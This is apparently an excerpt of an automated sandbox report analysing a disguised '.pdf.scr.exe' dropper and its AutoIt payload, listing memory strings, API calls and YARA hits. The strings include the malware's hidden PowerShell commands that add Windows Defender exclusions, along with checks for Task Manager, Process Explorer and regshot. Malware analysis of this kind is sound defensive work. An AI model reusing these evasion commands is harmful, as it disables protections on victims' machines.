      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0ei
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_allocateexespaceataddress
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e0b8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd0bffad7d777620aa9cd6ini
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f59570699c8b6657c8t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d63t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c.t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f59570699cbba617cyt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b1cab98e8327ctt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2de8a55d797c31aa90e1327cot
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamezt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenut
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitems
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("regshot.exe") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("taskmgr.exe") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: word machine;word numberofsections;dword timedatestamp;dword pointertosymboltable;dword numberofsymbols;,r*
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)!q/
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5*20c39e26/304/6/3052_4f0*2_d30_2_d70c2_e///05/75f2d/50920fd43039//e6266e20444f53206d6f64652e0d0d0*24nql
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00@s0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =0;p8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a;1p>
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a-}pz
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a+epb
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunch
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f9e720e1x~d
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bf3a765687634b29cd6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createobject("wscript.shell").run "
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6j
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb1cd5876247531994bcce137cbe4f905f4178f006
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c>
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6k
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ez
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0ci
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd23e39753777f38a797eb0855807ea04f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247crentversion\polici
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: set wshshell = wscript.createobject(
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: persistence-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600cs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mshta.exests
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variables
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770cf
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770ca
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9d617
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemdirte
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execute_vbs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770ci
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regsvcs.exest
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: delay
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mutexc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mshta.exese
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600c1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c717\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591g
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execute_vbsb
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _msgbox
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c22ff4bc756a603ab4a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kernel32.dll
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k3ysx
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tla&t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s_start
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @0xct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @7xdt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @phct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @m8ct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wxct
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BA3312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C0EBE5 mouse_event,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C013F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006CB1000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerg
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000031BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
      Source: ihgsvw.exe | Binary or memory string: Shell_TrayWnd
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000030D3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@K
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager\2+
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerk
      Source: ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: inGetText("Program Manager") = "0" Then
      Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager\
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: GetLocaleInfoW,GetNumberFormatW,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003EF654 cpuid
      Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BFE5F8 GetUserNameW,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003DB146 GetVersionExW,
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
      Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: regshot.exe

      Stealing of Sensitive Information

      Source: Yara match | File source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
